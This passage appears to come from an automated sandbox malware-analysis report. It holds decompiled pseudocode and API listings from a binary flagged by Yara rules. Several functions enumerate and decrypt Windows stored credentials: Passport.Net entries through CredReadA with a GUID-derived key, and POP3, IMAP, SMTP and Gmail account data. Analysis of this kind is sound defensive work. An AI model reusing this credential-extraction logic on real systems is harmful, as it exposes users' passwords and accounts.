                                                                        					_v20 = _v20 + 1;
                                                                        				} while (_v20 < _t66);
                                                                        				goto L10;
                                                                        			}


                                                                        APIs
                                                                        • GetDlgItem.USER32 ref: 004055B6
                                                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055CF
                                                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055DC
                                                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055E8
                                                                        • memset.MSVCRT ref: 00405652
                                                                        • SendMessageA.USER32(?,00001019,?,?), ref: 00405683
                                                                        • SetFocus.USER32(?), ref: 00405708
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessageSend$FocusItemmemset
                                                                        • String ID:
                                                                        • API String ID: 4281309102-0
                                                                        • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                        • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                        • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                        • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E0040D5DB(char* __ebx, void* __eflags) {
                                                                        				char _v8;
                                                                        				short* _v12;
                                                                        				int _v16;
                                                                        				intOrPtr _v20;
                                                                        				char _v24;
                                                                        				intOrPtr _v28;
                                                                        				char _v32;
                                                                        				intOrPtr _v48;
                                                                        				intOrPtr _v52;
                                                                        				int _v56;
                                                                        				char _v60;
                                                                        				char _v584;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t36;
                                                                        				intOrPtr _t44;
                                                                        				void* _t47;
                                                                        				char _t63;
                                                                        				int _t69;
                                                                        				void* _t74;
                                                                        
                                                                        				_t74 = __eflags;
                                                                        				_t69 = 0;
                                                                        				E004046D7( &_v584);
                                                                        				_v60 = 0;
                                                                        				_v56 = 0;
                                                                        				_t36 = E00404647( &_v60, 0, _t74);
                                                                        				_t75 = _t36;
                                                                        				if(_t36 != 0 && E004047A0( &_v584, _t75) != 0) {
                                                                        					_push( &_v8);
                                                                        					_push(0);
                                                                        					_push(4);
                                                                        					_push("Passport.Net\\*");
                                                                        					if(_v52() != 0) {
                                                                        						_t44 = _v8;
                                                                        						if( *((intOrPtr*)(_t44 + 0x30)) != 0 &&  *((intOrPtr*)(_t44 + 0x18)) > 0) {
                                                                        							_v32 =  *((intOrPtr*)(_t44 + 0x18));
                                                                        							_v28 =  *((intOrPtr*)(_t44 + 0x1c));
                                                                        							_t47 = 0;
                                                                        							_t63 = 0x4a;
                                                                        							do {
                                                                        								_t14 = _t47 + L"82BD0E67-9FEA-4748-8672-D5EFE5B779B0"; // 0x320038
                                                                        								 *(_t47 + 0x417768) =  *_t14 << 2;
                                                                        								_t47 = _t47 + 2;
                                                                        							} while (_t47 < _t63);
                                                                        							_v24 = _t63;
                                                                        							_v20 = 0x417768;
                                                                        							if(E00404811( &_v584,  &_v32,  &_v24,  &_v16) != 0) {
                                                                        								if(WideCharToMultiByte(0, 0, _v12, _v16,  &(__ebx[0x100]), 0xff, 0, 0) > 0 && strlen( *(_v8 + 0x30)) < 0xff) {
                                                                        									strcpy(__ebx,  *(_v8 + 0x30));
                                                                        									_t69 = 1;
                                                                        								}
                                                                        								LocalFree(_v12);
                                                                        							}
                                                                        							_t44 = _v8;
                                                                        						}
                                                                        						_v48(_t44);
                                                                        					}
                                                                        				}
                                                                        				E004046C2( &_v60);
                                                                        				E004047F1( &_v584);
                                                                        				return _t69;
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                          • Part of subcall function 00404647: LoadLibraryA.KERNEL32(advapi32.dll,?,0040D601,80000001,73AFF420), ref: 00404654
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 0040466D
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredFree), ref: 00404679
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404685
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404691
                                                                          • Part of subcall function 00404647: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040469D
                                                                          • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,73AFF420), ref: 004047A8
                                                                          • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,000000FF,00000000,00000000,?,?,00000001), ref: 0040D6A7
                                                                        • strlen.MSVCRT ref: 0040D6B7
                                                                        • strcpy.MSVCRT(?,?), ref: 0040D6C8
                                                                        • LocalFree.KERNEL32(?), ref: 0040D6D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$LibraryLoadstrcpy$ByteCharFreeLocalMultiWidestrlen
                                                                        • String ID: Passport.Net\*$hwA
                                                                        • API String ID: 3335197805-2625321100
                                                                        • Opcode ID: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                        • Instruction ID: 2e6419ae4a5a1056fcde8d8ccc48918818cbcf4cd0f285746335566170a6875e
                                                                        • Opcode Fuzzy Hash: 681d14a731c87845a5ac1aff75d07a7c211cae895baa553a1b5e579bb43f8a69
                                                                        • Instruction Fuzzy Hash: D4315C76D00109ABCB10EF96D9449EEB7BDEF84300F10047AF605E7291DB399A45CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 41%
                                                                        			E00407EFB(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
                                                                        				int _v0;
                                                                        				int _t26;
                                                                        				char* _t32;
                                                                        				int _t44;
                                                                        				signed int _t46;
                                                                        				signed int _t47;
                                                                        
                                                                        				_t38 = __ecx;
                                                                        				_t47 = _t46 & 0xfffffff8;
                                                                        				E004118A0(0x1040, __ecx);
                                                                        				_t26 = GetMenuItemCount(_a8);
                                                                        				_t44 = 0;
                                                                        				_v0 = _t26;
                                                                        				if(_t26 <= 0) {
                                                                        					L13:
                                                                        					return _t26;
                                                                        				} else {
                                                                        					goto L1;
                                                                        				}
                                                                        				do {
                                                                        					L1:
                                                                        					memset( &_a53, 0, 0x1000);
                                                                        					_t47 = _t47 + 0xc;
                                                                        					_a40 =  &_a52;
                                                                        					_a4.cbSize = 0x30;
                                                                        					_a8 = 0x36;
                                                                        					_a44 = 0x1000;
                                                                        					_a20 = 0;
                                                                        					_a52 = 0;
                                                                        					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
                                                                        					if(_t26 == 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					if(_a52 == 0) {
                                                                        						L10:
                                                                        						_t55 = _a24;
                                                                        						if(_a24 != 0) {
                                                                        							_push(0);
                                                                        							_push(_a24);
                                                                        							_push(_a4.cbSize);
                                                                        							_t26 = E00407EFB(_t38, _t55);
                                                                        							_t47 = _t47 + 0xc;
                                                                        						}
                                                                        						goto L12;
                                                                        					}
                                                                        					_t32 = strchr( &_a52, 9);
                                                                        					if(_t32 != 0) {
                                                                        						 *_t32 = 0;
                                                                        					}
                                                                        					_t33 = _a20;
                                                                        					if(_a24 != 0) {
                                                                        						if(_a12 == 0) {
                                                                        							 *0x4171b4 =  *0x4171b4 + 1;
                                                                        							_t33 =  *0x4171b4 + 0x11558;
                                                                        							__eflags =  *0x4171b4 + 0x11558;
                                                                        						} else {
                                                                        							_t18 = _t44 + 0x11171; // 0x11171
                                                                        							_t33 = _t18;
                                                                        						}
                                                                        					}
                                                                        					_t26 = E00407EC3(_t33,  &_a52);
                                                                        					_pop(_t38);
                                                                        					goto L10;
                                                                        					L12:
                                                                        					_t44 = _t44 + 1;
                                                                        				} while (_t44 < _v0);
                                                                        				goto L13;
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                                                        • String ID: 0$6
                                                                        • API String ID: 2300387033-3849865405
                                                                        • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                        • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                        • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                        • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 66%
                                                                        			E004044DA(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				char _v280;
                                                                        				char _v408;
                                                                        				intOrPtr _v412;
                                                                        				char _v668;
                                                                        				char _v796;
                                                                        				intOrPtr _v800;
                                                                        				char _v928;
                                                                        				char _v940;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t37;
                                                                        				void* _t44;
                                                                        				intOrPtr _t50;
                                                                        				void* _t56;
                                                                        				intOrPtr _t58;
                                                                        				void* _t63;
                                                                        
                                                                        				_t63 = __fp0;
                                                                        				_t50 = __ecx;
                                                                        				_v8 = __ecx;
                                                                        				E004021D8( &_v940);
                                                                        				_t58 = _a4;
                                                                        				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
                                                                        				_push(_t58 + 0x404);
                                                                        				_t44 = 0x7f;
                                                                        				E004060D0(_t44,  &_v796);
                                                                        				E004060D0(_t44,  &_v408, _t58 + 0x204);
                                                                        				E004060D0(_t44,  &_v928, _t58 + 4);
                                                                        				E004060D0(_t44,  &_v668, _t58 + 0x104);
                                                                        				_t37 = E004060D0(_t44,  &_v280, _t58 + 0x304);
                                                                        				_t56 = _t58 + 0x504;
                                                                        				_push("pop3");
                                                                        				_push(_t56);
                                                                        				L004115B2();
                                                                        				if(_t37 != 0) {
                                                                        					_push("imap");
                                                                        					_push(_t56);
                                                                        					L004115B2();
                                                                        					if(_t37 != 0) {
                                                                        						_push("smtp");
                                                                        						_push(_t56);
                                                                        						L004115B2();
                                                                        						if(_t37 == 0) {
                                                                        							_v412 = 4;
                                                                        						}
                                                                        					} else {
                                                                        						_v412 = 2;
                                                                        					}
                                                                        				} else {
                                                                        					_v412 = 1;
                                                                        				}
                                                                        				_v24 =  *((intOrPtr*)(_t58 + 0x804));
                                                                        				_v20 =  *((intOrPtr*)(_t58 + 0x808));
                                                                        				return E00402407( &_v940, _t63, _v8 + 0xfffffe38);
                                                                        			}
                                                                        APIs
                                                                          • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                          • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                        • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                        • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _stricmp$memcpystrlen
                                                                        • String ID: imap$pop3$smtp
                                                                        • API String ID: 445763297-821077329
                                                                        • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                        • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                        • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                        • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004036CC(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                                        				char _v5;
                                                                        				char _v132;
                                                                        				char _v404;
                                                                        				char _v532;
                                                                        				intOrPtr _v536;
                                                                        				char _v920;
                                                                        				intOrPtr _v924;
                                                                        				char _v1052;
                                                                        				char _v1064;
                                                                        				void* __ebx;
                                                                        				void* _t18;
                                                                        				char* _t20;
                                                                        				char* _t39;
                                                                        				char* _t41;
                                                                        				void* _t48;
                                                                        				void* _t59;
                                                                        
                                                                        				_t59 = __fp0;
                                                                        				_t48 = __edi;
                                                                        				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
                                                                        					return _t18;
                                                                        				}
                                                                        				_t39 =  &_v132;
                                                                        				_t20 = E0040E906(_t39, __edi + 0x87c, _a4);
                                                                        				if(_t20 != 0) {
                                                                        					_v5 = 0;
                                                                        					_t20 = strchr(_t39, 0x3a);
                                                                        					_t41 = _t20;
                                                                        					if(_t41 != 0) {
                                                                        						 *_t41 = 0;
                                                                        						E004021D8( &_v1064);
                                                                        						strcpy( &_v404,  &(_t41[1]));
                                                                        						strcpy( &_v532,  &_v132);
                                                                        						_v924 = 7;
                                                                        						_v536 = 3;
                                                                        						if(strlen( &_v532) + 0xa < 0x7f) {
                                                                        							sprintf( &_v920, "%s@gmail.com",  &_v532);
                                                                        						}
                                                                        						strcpy( &_v1052,  &_v532);
                                                                        						_t20 = E00402407( &_v1064, _t59, _t48);
                                                                        					}
                                                                        				}
                                                                        				return _t20;
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                          • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                          • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                          • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                        • strchr.MSVCRT ref: 00403706
                                                                        • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                        • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                        • strlen.MSVCRT ref: 0040375F
                                                                        • sprintf.MSVCRT ref: 00403783
                                                                        • strcpy.MSVCRT(?,?), ref: 00403799
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                        • String ID: %s@gmail.com
                                                                        • API String ID: 2649369358-4097000612
                                                                        • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                        • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                        • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                        • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040684D(char* __ebx, intOrPtr _a4, int _a8) {
                                                                        				char _v8;
                                                                        				void _v1031;
                                                                        				void _v1032;
                                                                        				void* _t26;
                                                                        				char* _t27;
                                                                        				int _t32;
                                                                        				int _t38;
                                                                        				char* _t43;
                                                                        				int _t44;
                                                                        				void* _t45;
                                                                        				void** _t48;
                                                                        				void* _t50;
                                                                        				void* _t51;
                                                                        
                                                                        				_t43 = __ebx;
                                                                        				_t44 = 0;
                                                                        				_v1032 = 0;
                                                                        				memset( &_v1031, 0, 0x3ff);
                                                                        				_t26 = _a8;
                                                                        				_t51 = _t50 + 0xc;
                                                                        				 *__ebx = 0;
                                                                        				if(_t26 > 0) {
                                                                        					_t48 = _a4 + 4;
                                                                        					_v8 = _t26;
                                                                        					do {
                                                                        						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
                                                                        						_t32 = strlen( &_v1032);
                                                                        						_a8 = _t32;
                                                                        						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
                                                                        						_t45 = _t44 + _a8 + 1;
                                                                        						_t38 = strlen( *_t48);
                                                                        						_a8 = _t38;
                                                                        						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
                                                                        						_t51 = _t51 + 0x30;
                                                                        						_t48 =  &(_t48[2]);
                                                                        						_t18 =  &_v8;
                                                                        						 *_t18 = _v8 - 1;
                                                                        						_t44 = _t45 + _a8 + 1;
                                                                        					} while ( *_t18 != 0);
                                                                        				}
                                                                        				_t27 = _t44 + _t43;
                                                                        				 *_t27 = 0;
                                                                        				 *((char*)(_t27 + 1)) = 0;
                                                                        				return _t43;
                                                                        			}
















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memcpystrlen$memsetsprintf
                                                                        • String ID: %s (%s)
                                                                        • API String ID: 3756086014-1363028141
                                                                        • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                        • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                        • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                        • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 25%
                                                                        			E0040E906(void* __ebx, int _a4, void* _a8) {
                                                                        				char _v20;
                                                                        				char _v36;
                                                                        				char _v52;
                                                                        				void* _t15;
                                                                        				void* _t17;
                                                                        				void* _t28;
                                                                        				intOrPtr* _t31;
                                                                        				int _t32;
                                                                        
                                                                        				_t28 = __ebx;
                                                                        				_t31 = __imp__UuidFromStringA;
                                                                        				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
                                                                        				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
                                                                        				if(_t15 != 0 || _t17 != 0 || E0040E8CA( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t32 = _a4;
                                                                        					if(_t32 > 0x7e) {
                                                                        						_t32 = 0x7e;
                                                                        					}
                                                                        					memcpy(_t28, _a8, _t32);
                                                                        					 *((char*)(_t28 + _t32)) = 0;
                                                                        					__imp__CoTaskMemFree(_a8);
                                                                        					return 1;
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                        • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                        • memcpy.MSVCRT ref: 0040E966
                                                                        • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                        Strings
                                                                        • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                        • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FromStringUuid$FreeTaskmemcpy
                                                                        • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                        • API String ID: 1640410171-3316789007
                                                                        • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                        • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                        • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                        • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {
                                                                        
                                                                        				 *__edi =  *__edi + __ecx;
                                                                        			}



                                                                        0x00409e38

                                                                        APIs
                                                                          • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                                          • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                        • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                        • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                        • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                        • String ID:
                                                                        • API String ID: 3673709545-0
                                                                        • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                        • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                                        • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                                        • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {
                                                                        
                                                                        				 *__edi =  *__edi + __ecx;
                                                                        			}



                                                                        0x00409e38

                                                                        APIs
                                                                          • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                                          • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                                        • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                                        • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                                        • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                        • String ID:
                                                                        • API String ID: 3673709545-0
                                                                        • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                        • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                                        • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                                        • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E00407D0A(void* __eflags, struct HWND__* _a4) {
                                                                        				void _v4103;
                                                                        				char _v4104;
                                                                        				void* _t8;
                                                                        				void* _t17;
                                                                        
                                                                        				_t8 = E004118A0(0x1004, _t17);
                                                                        				_t21 =  *0x4171b8;
                                                                        				if( *0x4171b8 != 0) {
                                                                        					_v4104 = 0;
                                                                        					memset( &_v4103, 0, 0x1000);
                                                                        					sprintf(0x4172c0, "dialog_%d",  *0x417300);
                                                                        					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
                                                                        						SetWindowTextA(_a4,  &_v4104);
                                                                        					}
                                                                        					return EnumChildWindows(_a4, E00407CAD, 0);
                                                                        				}
                                                                        				return _t8;
                                                                        			}








                                                                        APIs
                                                                        • memset.MSVCRT ref: 00407D35
                                                                        • sprintf.MSVCRT ref: 00407D4A
                                                                          • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                          • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                          • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                                        • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                                        • EnumChildWindows.USER32 ref: 00407D81
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                                        • String ID: caption$dialog_%d
                                                                        • API String ID: 246480800-4161923789
                                                                        • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                        • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                                        • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                                        • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 35%
                                                                        			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
                                                                        				void* _v8;
                                                                        				signed int _v12;
                                                                        				unsigned int _v16;
                                                                        				int _v20;
                                                                        				intOrPtr _v28;
                                                                        				char _v32;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				char _v308;
                                                                        				intOrPtr _v312;
                                                                        				void _v316;
                                                                        				void _v579;
                                                                        				char _v580;
                                                                        				char _v844;
                                                                        				intOrPtr _v1104;
                                                                        				intOrPtr _v1108;
                                                                        				intOrPtr _v1112;
                                                                        				char _v1132;
                                                                        				char _v17516;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* _t63;
                                                                        				void* _t64;
                                                                        				void* _t77;
                                                                        				intOrPtr _t84;
                                                                        				void _t94;
                                                                        				int _t102;
                                                                        				void* _t106;
                                                                        				void* _t107;
                                                                        
                                                                        				E004118A0(0x446c, __ecx);
                                                                        				_t102 = 0;
                                                                        				_v20 = 0;
                                                                        				if(E0040629C() == 0 ||  *0x417518 == 0) {
                                                                        					if( *0x417514 != _t102) {
                                                                        						_t94 = _a4;
                                                                        						_t63 =  *0x416fe0(8, _t94);
                                                                        						_v8 = _t63;
                                                                        						if(_t63 != 0xffffffff) {
                                                                        							_v20 = 1;
                                                                        							_v1132 = 0x224;
                                                                        							_t64 =  *0x416fd8(_t63,  &_v1132);
                                                                        							while(_t64 != 0) {
                                                                        								memset( &_v316, _t102, 0x118);
                                                                        								_v312 = _v1104;
